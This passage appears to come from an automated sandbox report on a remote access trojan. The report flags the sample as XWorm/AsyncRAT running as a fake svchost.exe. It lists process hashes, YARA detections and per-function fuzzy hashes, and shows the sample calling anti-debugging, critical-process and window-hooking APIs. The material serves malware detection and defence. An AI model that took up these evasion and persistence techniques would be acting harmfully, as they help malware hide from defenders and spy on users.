Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	16:51:53
Start date:	06/12/2024
Path:	C:\ProgramData\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\svchost.exe
Imagebase:	0x280000
File size:	82'944 bytes
MD5 hash:	F068A2F351D11284FEE8D768A64F6C9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\svchost.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\svchost.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\svchost.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	16:52:01
Start date:	06/12/2024
Path:	C:\ProgramData\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\svchost.exe
Imagebase:	0xe30000
File size:	82'944 bytes
MD5 hash:	F068A2F351D11284FEE8D768A64F6C9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	16:52:02
Start date:	06/12/2024
Path:	C:\ProgramData\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\svchost.exe"
Imagebase:	0x7ff799c70000
File size:	82'944 bytes
MD5 hash:	F068A2F351D11284FEE8D768A64F6C9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	16:52:10
Start date:	06/12/2024
Path:	C:\ProgramData\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\svchost.exe"
Imagebase:	0x690000
File size:	82'944 bytes
MD5 hash:	F068A2F351D11284FEE8D768A64F6C9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	16:53:00
Start date:	06/12/2024
Path:	C:\ProgramData\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\svchost.exe
Imagebase:	0x610000
File size:	82'944 bytes
MD5 hash:	F068A2F351D11284FEE8D768A64F6C9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	23.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	33.3%
Total number of Nodes:	9
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD34889189 Relevance: 4.3, Strings: 2, Instructions: 1783
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

B, xrefs: 00007FFD3488A32D
CAP_^, xrefs: 00007FFD3488A351

Memory Dump Source

Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd

Similarity

API ID:
String ID: B$CAP_^
API String ID: 0-1844865650
Opcode ID: f6b290b9a53f8385fd8826254d5b1034cc088a7af38888596d1de083da3ff48e
Instruction ID: 4b69a8ca50ae0e4e752ac4ad855ad2f86fef1ab11efbe9df877d0f59bc8eef9d
Opcode Fuzzy Hash: f6b290b9a53f8385fd8826254d5b1034cc088a7af38888596d1de083da3ff48e
Instruction Fuzzy Hash: 6AD26470B18A094FEB98EF68C4A57B9BBE2FF98304F14457DD44DD3291DE38A8819B41

Function 00007FFD3488959A Relevance: 3.6, Strings: 2, Instructions: 1131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

B, xrefs: 00007FFD3488A32D
CAP_^, xrefs: 00007FFD3488A351

Memory Dump Source

Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd

Similarity

API ID:
String ID: B$CAP_^
API String ID: 0-1844865650
Opcode ID: 71a57318812011c834e091bc1688a4630333c921b1ec2ff32fb6e49d1ad7dcd8
Instruction ID: e13c6ad70d97d389c9ea221c2bd937c18daf1ac00c540708f562647cff83080e
Opcode Fuzzy Hash: 71a57318812011c834e091bc1688a4630333c921b1ec2ff32fb6e49d1ad7dcd8
Instruction Fuzzy Hash: BA826770B18A094FEB98EB6CC4A57B9BBE2FF98304F14457DD44DD3291DE38A8819B41

Function 00007FFD348816D9 Relevance: 2.1, Strings: 1, Instructions: 877
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CAP_^, xrefs: 00007FFD3488191A

Memory Dump Source

Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd

Similarity

API ID:
String ID: CAP_^
API String ID: 0-2920077663
Opcode ID: a81b4b958df6ec2fb04cd53230a9f1aac2fb5ee4fc9f9261eefc1162634b7b06
Instruction ID: 45b2787a9300608371f91baddfb9e46ca06980ccc5ca3accdd7e49125719ca5f
Opcode Fuzzy Hash: a81b4b958df6ec2fb04cd53230a9f1aac2fb5ee4fc9f9261eefc1162634b7b06
Instruction Fuzzy Hash: 9852B520B18A494FE7A8FB6C84B96B977D2FF99300F540579E44EC32D6DE38B8419781

Function 00007FFD34887AD1 Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32 ref: 00007FFD34887B80

Memory Dump Source

Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: e2264ac129f1242ffdbac6eaad9e60732acdc59712dbbd8a4cb9e3209a6df534
Instruction ID: 26d78beed20873a197d743e974a718d0a076c37cacf1358094f3f806b9cf6cc7
Opcode Fuzzy Hash: e2264ac129f1242ffdbac6eaad9e60732acdc59712dbbd8a4cb9e3209a6df534
Instruction Fuzzy Hash: F731F3319087588FCB58DF98C8866E97BE0FF65321F04426AD489D7292DB34A846CB91

Function 00007FFD34886116 Relevance: .5, Instructions: 468
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 179017b53f054d3a3ce3b23a2d4b5ff0be5b99e685d8849f2f1b86d9443b3292
Instruction ID: 293d9f849fad26742f2709656b35dd133ee6dbd90dead85d2bed16845d00580c
Opcode Fuzzy Hash: 179017b53f054d3a3ce3b23a2d4b5ff0be5b99e685d8849f2f1b86d9443b3292
Instruction Fuzzy Hash: 2EF1B430A0CA8D8FEBA8DF28D8557E977E1FF55310F04426EE84DC7291DB38A9458B81

Function 00007FFD348872D2 Relevance: .5, Instructions: 454
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b3ed3265b750d73b2cd5a53030d102071bb57e5579bf4fc9bf3d6efcb2612ef
Instruction ID: 93174064e4b8d98bf4ec8524f339314b86221e7ec062c98c2c374a603d2391d6
Opcode Fuzzy Hash: 1b3ed3265b750d73b2cd5a53030d102071bb57e5579bf4fc9bf3d6efcb2612ef
Instruction Fuzzy Hash: 9DE1A530A08A4E8FEBA8DF28C8A57E977E1FF55310F14426ED84DC7291DF78A9458781

Function 00007FFD348823E1 Relevance: .4, Instructions: 391
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ce25af44c21f644034ac8b9c59faf01d0d1c4adb56f36ce0e56e353008b3f76
Instruction ID: 74e863e4f9cdf8b211d61f9f7f68b325bd0e5fba11f32cb138dd38c158b4e45e
Opcode Fuzzy Hash: 3ce25af44c21f644034ac8b9c59faf01d0d1c4adb56f36ce0e56e353008b3f76
Instruction Fuzzy Hash: 39C19271B1CA494FEBD8EB6884B52B977D2FF99304F04417AD14ED32D2DE2CA8419741

Function 00007FFD34882145 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f835e9a816c945bead5d2c0d2fdd9ce6bd1eb9f531422435feaa0804a78c68c
Instruction ID: a549a36555aa6379072bcf6142cff1b4922f6f725eae93d50527783185db60cb
Opcode Fuzzy Hash: 0f835e9a816c945bead5d2c0d2fdd9ce6bd1eb9f531422435feaa0804a78c68c
Instruction Fuzzy Hash: B2510214B0E6C54FE796A7B888B4276BFD9DF87215B1805FBE0C9C7193DD186806C342

Function 00007FFD3488C1E0 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e359ac24c7d461e64c0ba72b1fd9bfee24b12dfeaf244330d283f2ed5ca8e92b
Instruction ID: 51a99403dbbb5a31a303f0607e84ac17227c5f52ed02c146448ca0c98e8afec6
Opcode Fuzzy Hash: e359ac24c7d461e64c0ba72b1fd9bfee24b12dfeaf244330d283f2ed5ca8e92b
Instruction Fuzzy Hash: 9551B471A0DA898FDB99EB68D4A56A97BF0FF16310F0400BFD149C7697CB29E841CB41

Function 00007FFD3488B6ED Relevance: 1.6, APIs: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFD3488B7C2

Memory Dump Source

Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: 2fbb4927bd770bf55cc79139944abddf2464079d643513ee27375d2721a567bb
Instruction ID: e4400aab7c3bb98e906bc489574997c1c5c82abef703ab2f682eed59c9f1da90
Opcode Fuzzy Hash: 2fbb4927bd770bf55cc79139944abddf2464079d643513ee27375d2721a567bb
Instruction Fuzzy Hash: C641C43190C7488FD719DFA8D855AE9BBF0FF56311F04416EE08AD3692CB786846CB91

Function 00007FFD3488BC38 Relevance: 1.6, APIs: 1, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFD3488BD01

Memory Dump Source

Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: ceb5da8b91e57bcd69608df6f1557a88bf559b64898da5975355f44ebfa7a646
Instruction ID: edb94979767f05599f7b936d6086706f96a417f78a6f0896129f89c0f6ee57a5
Opcode Fuzzy Hash: ceb5da8b91e57bcd69608df6f1557a88bf559b64898da5975355f44ebfa7a646
Instruction Fuzzy Hash: 6D410B30A1CA4D4FDB58DB5C98566F97BE1EF6A321F04027EE059D3292CE74681287C1

Non-executed Functions

Function 00007FFD3488AC55 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 458afff8ac0e356892aa284821c7dfc33e3126430d5de76deef241d39183922f
Instruction ID: 619f6790ed8c2e3a66675acc5f9b4840d27a5f2148e4fde73bebd7dc65b3f0ed
Opcode Fuzzy Hash: 458afff8ac0e356892aa284821c7dfc33e3126430d5de76deef241d39183922f
Instruction Fuzzy Hash: ED718457A0F6D21FE7A2872818B51E96F91EF9321470844FBD2D8CB0D7D94D680A9392

Analysis Process: powershell.exePID: 2444, Parent PID: 6216COMMON

Executed Functions

Function 00007FFD348A9FFB Relevance: .5, Instructions: 522COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2228770522.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f33c11d599915b0c9e50ca8c1d44ba761d4c943bc572d82236c28c3529038a24
Instruction ID: 858114e185145b4bd2b17c60983dad562aef15ccd9fcef067cc4b2d1dcd7aaf3
Opcode Fuzzy Hash: f33c11d599915b0c9e50ca8c1d44ba761d4c943bc572d82236c28c3529038a24
Instruction Fuzzy Hash: 5C511966A0EBC59FE75357285CBA0D97FA0EF13314B0901F7C985CA0A3EE5D1806D762

Function 00007FFD348AA8CC Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2228770522.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 034bba971956191502e2e317cbc02801eea83624432632ac991fd0ab119f0db9
Instruction ID: c250bb63efe1ae19db4d275c7a6e588897e6163258001ac04db02c8acefd80e9
Opcode Fuzzy Hash: 034bba971956191502e2e317cbc02801eea83624432632ac991fd0ab119f0db9
Instruction Fuzzy Hash: FC713531A0EBC64FE35ADB2888A94A9BBE0EF5731471801FED099C7593ED1DA843C751

Function 00007FFD34974073 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2229326324.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e96c18b6b05b8a3d57b2a53d5cb8dbd593eef3cb89d65dcc01bde964c77f0252
Instruction ID: ad0e38f6ae13d018e629e301bd482e55a2663c7389b372188d291860b670c1d5
Opcode Fuzzy Hash: e96c18b6b05b8a3d57b2a53d5cb8dbd593eef3cb89d65dcc01bde964c77f0252
Instruction Fuzzy Hash: 77513D32B0DA968FE799E61C58B15747BD2EFA6250B1840BFC18DC7197DE28EC058351

Function 00007FFD34974370 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2229326324.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b969f9b379dbff3a40e9155f6740d1c781e24a57a6340ae0b4a9f4f38c116c8
Instruction ID: 24e222f49812b9d41151d03cce25ec0fb750101caa0823cf0dd0f45235d10328
Opcode Fuzzy Hash: 7b969f9b379dbff3a40e9155f6740d1c781e24a57a6340ae0b4a9f4f38c116c8
Instruction Fuzzy Hash: 0C416A32B0DA498FEBA5D76C58A05B47BD1EF42324B0840BFC18DC7187EA18BC049391

Function 00007FFD348A9758 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2228770522.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00982cc7534a065601e856ca55a45da10b81577d5892ab61de019c764f1c1e8e
Instruction ID: b69342728d15ca029aa2a4a9c44c1833a6dd25ee6945e8cf973ca1deeab02bb6
Opcode Fuzzy Hash: 00982cc7534a065601e856ca55a45da10b81577d5892ab61de019c764f1c1e8e
Instruction Fuzzy Hash: BE312A7190CB488FDB589F4C98466E97BE0FB99310F10412FE449D3292DB74A846CBD2

Function 00007FFD3478E620 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2228269977.00007FFD3478D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3478D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3478d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 448e8b01fe7154356b84ee6cc3643c8f66fc3cf67b58b1f7463dd4e83399e8fd
Instruction ID: 2a6fe6805ce974010ab3abe2b3091b0a53597c3caa4aad8e758309cb7619deaa
Opcode Fuzzy Hash: 448e8b01fe7154356b84ee6cc3643c8f66fc3cf67b58b1f7463dd4e83399e8fd
Instruction Fuzzy Hash: 544125B150DBC48FE7969B2898569523FF0EF53320B1501DFD088CB0A3D629A846C7A3

Function 00007FFD348AB1E5 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2228770522.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 076068e8a97327c74345ccf010700c71f05f1767717fceba7bae0ec17395a79b
Instruction ID: c0653995d31bf36a40f568af4635475b578d26224b3305d29b52f9ef9349b814
Opcode Fuzzy Hash: 076068e8a97327c74345ccf010700c71f05f1767717fceba7bae0ec17395a79b
Instruction Fuzzy Hash: FC31347090D6888FDB56DBAC98956EA3FF4EF93321F0441AFD088C7053DA68541AC792

Function 00007FFD349740BF Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2229326324.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9ce89068947b87e098d86cd8cc5f1a81f0ff9b90f3080742178a14f17e89483
Instruction ID: 143793e519330c8d51193b33c3f6e9c0315e1f2d6f2e7d43e56018518ba82eeb
Opcode Fuzzy Hash: f9ce89068947b87e098d86cd8cc5f1a81f0ff9b90f3080742178a14f17e89483
Instruction Fuzzy Hash: B5210B22B0D9978FE7A5E71C48F05346AC1EF66250B4940BED18DC71A7CD1CEC049311

Function 00007FFD349743BC Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2229326324.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dca437be6f1f975c7818d97be86e3234dc8d77540ac6ac39bce95f0fee2211a
Instruction ID: ea76e641d65e193f5d4d85799d9c43806f784c872fc652f5a2e49c06ddd7ff0e
Opcode Fuzzy Hash: 7dca437be6f1f975c7818d97be86e3234dc8d77540ac6ac39bce95f0fee2211a
Instruction Fuzzy Hash: 2811E032A0E5858FE7A4D71898F45B87BD1EF0222474940FED59DDB09BCA1DBC049761

Function 00007FFD3497681E Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2229326324.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3c6f4a649a0a09d04eb2be6004783833fc40251e3670485b431ff3f2ec4b44d
Instruction ID: d8e50bed03419d1b036f4f05640cd88d730580883ab07a05da402856c8cc59a4
Opcode Fuzzy Hash: e3c6f4a649a0a09d04eb2be6004783833fc40251e3670485b431ff3f2ec4b44d
Instruction Fuzzy Hash: 6A110672B0D6884FEB65EA9848E45E87FD1EF56320B0880BEC54DCB197CD2DAC45C320

Function 00007FFD348A33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2228770522.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 0c5e5649d06d92c1145b5404b9a75156bb07d5da2bacdf6660bb961c601e6699
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 5C01677121CB0D4FD744EF4CE451AA6B7E0FB99364F10056DE58AC3651DA36E882CB45

Non-executed Functions

Function 00007FFD348A8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

M_^J, xrefs: 00007FFD348A8C8A
M_^4, xrefs: 00007FFD348A8BFA
M_^7, xrefs: 00007FFD348A8C12
M_^F, xrefs: 00007FFD348A8C7A

Memory Dump Source

Source File: 00000002.00000002.2228770522.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd

Similarity

API ID:
String ID: M_^4$M_^7$M_^F$M_^J
API String ID: 0-622050427
Opcode ID: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
Instruction ID: 9c0c05f8c333faab2dea8e5433de44f93eadbb4ada4e22e1690e82e5527060d5
Opcode Fuzzy Hash: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
Instruction Fuzzy Hash: 9B21F2A7708465AED3127BFDA8249EA3754CF9433478917B2E198DB083F92870868AD0

Analysis Process: powershell.exePID: 2308, Parent PID: 6216COMMON

Executed Functions

Function 00007FFD348B644D Relevance: .7, Instructions: 708COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2323209900.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66932d015b3256cf929a258bd51274ccb0e4c155c49055baa97d695cf8898f38
Instruction ID: fa2700455c919a45d6533336f842e0bd780b0f250de50cdc037529723fe0290d
Opcode Fuzzy Hash: 66932d015b3256cf929a258bd51274ccb0e4c155c49055baa97d695cf8898f38
Instruction Fuzzy Hash: B3D17030A08A4D8FDF99DF58C4A5AA97BE1FF69300F14416AD40DE72A6CB74E841DBC1

Function 00007FFD348BB258 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2323209900.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ea2c40086c9b622985f0b04f80e3ae263f9053f05bf92ec54015c766a496468
Instruction ID: b058aae7dd5b20f2e59f9f9e63dd613d59b8e28c4fd34cd1dbc95b0f45ac7e38
Opcode Fuzzy Hash: 4ea2c40086c9b622985f0b04f80e3ae263f9053f05bf92ec54015c766a496468
Instruction Fuzzy Hash: FFB12770A1CB484FD759EF1CC8A56B57BE1FF9A310F10017ED18AC36A2DA65E846CB81

Function 00007FFD34984073 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2324167569.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a3ed0299c993d918637b344ced00cbf01412e8c2f3cda650722af49fafc6fd
Instruction ID: 5f640445e63b09da525e11dd19b23660d6e862f0d8feb4db72390bf08616c69e
Opcode Fuzzy Hash: e4a3ed0299c993d918637b344ced00cbf01412e8c2f3cda650722af49fafc6fd
Instruction Fuzzy Hash: D5515832B0DA968FEBD9DA1C44B167577D2EFA6220B5801BEC24DC7197EE28EC058351

Function 00007FFD34984370 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2324167569.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea40f62c7d952388400764e493b9bd61f22a8010dae4dba17ff222f8f35981d0
Instruction ID: 1efc0dd5c82122bf7ff63ace4bc6bb2d07a2b41ead474a62663e99224a2502d2
Opcode Fuzzy Hash: ea40f62c7d952388400764e493b9bd61f22a8010dae4dba17ff222f8f35981d0
Instruction Fuzzy Hash: 4A41F432B0DA898FEBE9D76C54A15B477D1EF46224B0801BFD14DC7197E919BC048391

Function 00007FFD348B974E Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2323209900.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3993f97dbc1adf892593a69c38dbcc26ff75f7e4b3dca034d2b57162b852c5b
Instruction ID: bdc80dc57b3cadc382dbcbdc2e8bd38b5ccd619c363b5967ab1aa2505176a1ee
Opcode Fuzzy Hash: e3993f97dbc1adf892593a69c38dbcc26ff75f7e4b3dca034d2b57162b852c5b
Instruction Fuzzy Hash: BE412731A0DB885FDB19DB5C9C5A6A87FE0FB66310F04417FD449D3293CA64A816CBC2

Function 00007FFD3479EE20 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2322359071.00007FFD3479D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3479D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd3479d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fde919d85721195787467d06f189b2d7542cad7b8cd8b549ad5902a50ec7f828
Instruction ID: 6c084f4e17507ab7960558ff0b501d5971c776ca1821c289df1c011c5a655595
Opcode Fuzzy Hash: fde919d85721195787467d06f189b2d7542cad7b8cd8b549ad5902a50ec7f828
Instruction Fuzzy Hash: A241F67190DBC48FE7569B3998959523FF0EF53320B1905EFD088CB1A3D629B845C792

Function 00007FFD349840BF Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2324167569.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec2c3239382e2850254ec55decac601eff91133d498350d34ea9d23da68f92b0
